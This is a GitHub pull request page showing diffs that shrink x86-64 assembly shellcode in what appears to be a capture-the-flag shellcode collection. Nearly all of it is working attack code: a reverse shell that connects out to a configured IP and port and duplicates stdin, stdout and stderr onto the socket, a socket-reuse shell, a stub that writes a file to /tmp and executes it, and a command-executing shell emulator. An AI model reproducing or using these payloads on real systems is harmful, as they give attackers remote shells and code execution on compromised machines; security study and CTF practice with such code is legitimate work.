Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Small optimizations #13

Open
wants to merge 11 commits into
base: master
Choose a base branch
from
Open

Small optimizations #13

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
11 commits
Select commit Hold shift + click to select a range
646798c
Update shell64.s
May 7, 2015
748a549
Update shell64.s
May 7, 2015
4dcadb7
Update shell64.s
May 10, 2015
77694f9
shorter opcodes
Dec 15, 2015
df6204f
test some micro-optimizations
Dec 15, 2015
d341872
small optimizations
Dec 15, 2015
510fbff
use shorter opcode as value fits in a 32bit reg
Dec 15, 2015
06a7345
minor optimizations
Dec 15, 2015
e3a6a63
Update shell64.s
Sep 18, 2016
31b11c4
Update shell64.s
Sep 18, 2016
85e1ff9
Merge branch 'osirislab:master' into master
Sep 27, 2021
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
44 changes: 17 additions & 27 deletions 64bitPutFileOnDisk/shell64.s
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -25,22 +25,15 @@ main:
; r9 = 0

; mmap(0, 1M, PROT_READ|PROT_WRITE, MAP_PRIVATE, input_fd, 0)
mov r8, rdx ; r8 = input
mov r8, rbx ; r8 = input

xor rdi, rdi ; rdi = 0

mov rdx, rdi
mov rax, rdi
mov rcx, rdi
mov r8, rdi
mov r9, rdi

mov rsi, rdi
mov sil, 0x1
shl rsi, 22 ; rsi = 4M

mov dl, 0x3 ; rdx = 0x3
mov cl, 0x2 ; rdl = 0x2
xor edi, edi ; rdi = 0
xor eax, eax
xor esi, esi
bts esi, 22 ; rsi = 4M
xor r9d, r9d
lea edx, [rdi+0x3] ; rdx = 0x3
lea ecx, [rdi+0x2] ; rdl = 0x2

mov al, __NR_mmap
syscall ; call mmap
Expand All @@ -51,32 +44,29 @@ main:
mov r9, rsi ; r9 = size

; open(filename, O_CREAT|O_RDWR, 0700)
xor rax, rax
mov rdi, rax
mov rdx, rax
push rax,
xor eax, eax
push rax
push qword stackcookie ; TODO verify this
push 0x706d742f ; stack = /tmp/filename\0
mov rdi, rsp ; rdi = stack
mov rsi, rax
mov sil, 0x42 ; ril = O_CREAT|O_RDWR
mov dl, 0x7
shl dl, 0x6
lea esi, [rax+0x42] ; ril = O_CREAT|O_RDWR
lea edx, [rax+0x7]
shl edx, 0x6
mov al, __NR_open
syscall ; call open

; write(output, buffer, size)
mov rdi, rax ; rdi = output
mov rsi, r8 ; rsi = buffer
mov rdx, r9 ; rdx = size
xor rax, rax
xor eax, eax
mov al, __NR_write
syscall ; call write

; exec(filename, 0, 0)
mov rdi, rsp ; rdi = filename
xor rsi, rsi ; rsi = 0
mov rdx, rsi ; rdx = 0
mov rax, rsi ; rax = 0
xor esi, esi ; rsi = 0
xor edx, edx ; rdx = 0
xor eax, eax ; rax = 0
mov al, __NR_execve
syscall ; call execve
33 changes: 16 additions & 17 deletions 64bitSocketReuse/shell64.s
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -16,41 +16,40 @@ global main

main:
mov rsi,rsp ; TODO is this too early?
xor si,si ; rsi=some valid stack address
and rsi,0xf0000 ; rsi=some valid stack address

push byte 20 ;adjust for the popularity of the ctf
pop rdi
xor edx, edx
lea edi, [rdx+20] ;adjust for the popularity of the ctf

;; rdi is the starting fd to read from, we try each in decending order
push byte 4;read 4 bytes
pop rdx

;; rdi is the starting fd to read from, we try each in descending order
mov dl, 4 ;read 4 bytes
mov ebx, MAGIC
ourread:
dec rdi
sub edi, 1
%ifdef DEBUG
jnz ourread.next
int 3; this breakpoint triggers if we DON'T find the magic number
hlt
%endif

.next:
SYSTEM_CALL(read)
xor eax, eax
mov al, read
syscall

cmp al,4 ;check to see if we've received our 4 bytes
jnz ourread ;if not, try with another file descriptor
;;TODO: lets get rid of this cmp al,4 nonsense and save some bytes.
cmp [rsi], MAGIC ;this is our magic number %defined on top
cmp ebx, [rsi] ;this is our magic number %defined on top
jnz ourread ; if we don't match try another file descriptor


;; this dup2 code attaches stdin stdout and stderr to our socket
;; so that we can talk to whatever program we run later
mydup2:
push byte 2
pop rsi
xor eax, eax
lea esi, [rax+2] ; loop count and fd
copy_stdin_out_err:
SYSTEM_CALL(dup2)
dec rsi
mov al, dup2
syscall
sub esi,1
jns copy_stdin_out_err


Expand Down
79 changes: 36 additions & 43 deletions 64shellEmulator/shell64.s
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -11,47 +11,45 @@
main:

do_fork:
push byte fork
pop rax
SYSTEM_CALL
test rax,rax
xor eax, eax
mov al fork
syscall
test eax,eax
jz child
parent:
push wait4
pop rax
xor rdi,rdi ;pid
xor rsi,rsi ;status
xor rdx,rdx ;options
xor rcx,rcx ;struct rusage*=NULL
SYSTEM_CALL ;wait(0,0,0,0);
xor edi,edi ;pid
xor esi,esi ;status
xor edx,edx ;options
xor ecx,ecx ;struct rusage*=NULL
lea eax,[rdi+wait4]
syscall ;wait(0,0,0,0);
jmp main

child:
cld
get_input:
xor rax,rax
cdq
mov dx,BUFFERLEN ;size of read
xor eax,eax
lea edx,[rax+BUFFERLEN] ;size of read
mov r8d, edx ;save readsize
sub rsp,rdx ;make some room on the stack
mov rsi,rsp ;use new stack space as buffer for read
xor rdi,rdi ;fd
xor edi,edi ;fd
mov al,read
SYSTEM_CALL ;read into stack buffer
syscall ;read into stack buffer

mov rbp,rax ;save len of str_read
test rax,rax ;we must read more than 0 bytes
mov ebp,eax ;save len of str_read
test eax,eax ;we must read more than 0 bytes
jz do_exit ;synchronous IO or GTFO
mov byte [rax+rsp-1],0 ;replace newline with nullbyte
push rax ;save strlen on the stack
xor edx, edx
lea rcx, [rax+rsp]
mov byte [rcx-1],dl ;replace newline with nullbyte


;; let's parse the arguments here
pop rcx ;return of read pushed by get_input
push byte " " ;delimiter
pop rax ;we're going to inline a strchr
mov ecx,eax ;return of read pushed by get_input
lea eax, [rdx+0x20] ;" " (space) is the delimiter
mov rbx,rsp ;rbx is the buffer
xor rdx,rdx
add rsp,BUFFERLEN ;rsp is now going to be argv
xor edx,edx
add rsp,r8 ;rsp is now going to be argv
add_token: ;; calculate the pointer to push

mov rsi,rbp ;number of chars in buffer
Expand All @@ -60,33 +58,28 @@ add_token: ;; calculate the pointer to push

lea rdi,[rbx + rsi] ;rdi points to current token
mov [rsp+rdx*8], rdi ;save the current token pointer building argv
inc rdx ;increment index into argv


add edx, 1 ;increment index into argv
scan_loop:
repne scasb

mov rsi,rbp
sub rsi,rcx
mov byte[rbx+rsi-1],0 ;null terminate each token (strtok)

xor eax, eax
mov byte[rbx+rsi-1],al ;null terminate each token (strtok)
mov al, 0x20 ; delimiter
test rcx,rcx
jz exec

jmp short add_token
jnz short add_token

exec:
xor rax,rax
xor eax,eax
mov [rsp+rdx*8],rax
cdq

mov al,execve
mov rdi,rbx
mov rsi,rsp
;; rdx=null
SYSTEM_CALL ;execve(cmd,args,environ=NULL);
xor edx, edx ; rdx=null
syscall ;execve(cmd,args,environ=NULL);

do_exit:;; exit nicely if anything fails
push byte exit
pop rax
xor rdi,rdi
SYSTEM_CALL
xor edi,edi
lea eax,[rdi+exit]
syscall
32 changes: 16 additions & 16 deletions reverse64IPv4/r64.s
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -24,33 +24,33 @@ BITS 64
main:

open_my_socket:
push byte AF_INET
pop rdi
push byte SOCK_STREAM
pop rsi
push byte ANY_PROTO
pop rdx
SYSTEM_CALL(socket)
xor edx, edx; ANY_PROTO
lea edi, [rdx+AF_INET]
lea esi, [rdx+SOCK_STREAM]
lea eax, [rdx+socket]
syscall

xchg rax,rdi
make_sockaddr:
push byte 0 ;lame part of sockaddr
xor edx, edx
push rdx ;lame part of sockaddr
mov rax, (IP <<32 | PORT <<16 | AF_INET)
push rax ;important part of sockaddr

mov rsi,rsp ;struct sockaddr*
push 0x10
pop rdx ;addrlen
;RDI=sockfd
SYSTEM_CALL(connect)
lea eax, [rdx+connect]
mov dl, 0x10
syscall
;; assume success (RAX=0)


push byte 2 ;loop count and FD#
pop rsi
xor eax, eax
lea esi, [rax+2] ;loop count and FD#

copy_stdin_out_err:
SYSTEM_CALL(dup2)
dec rsi
mov al, dup2
syscall
dec esi
jns copy_stdin_out_err

;; Any local shellcode here
Expand Down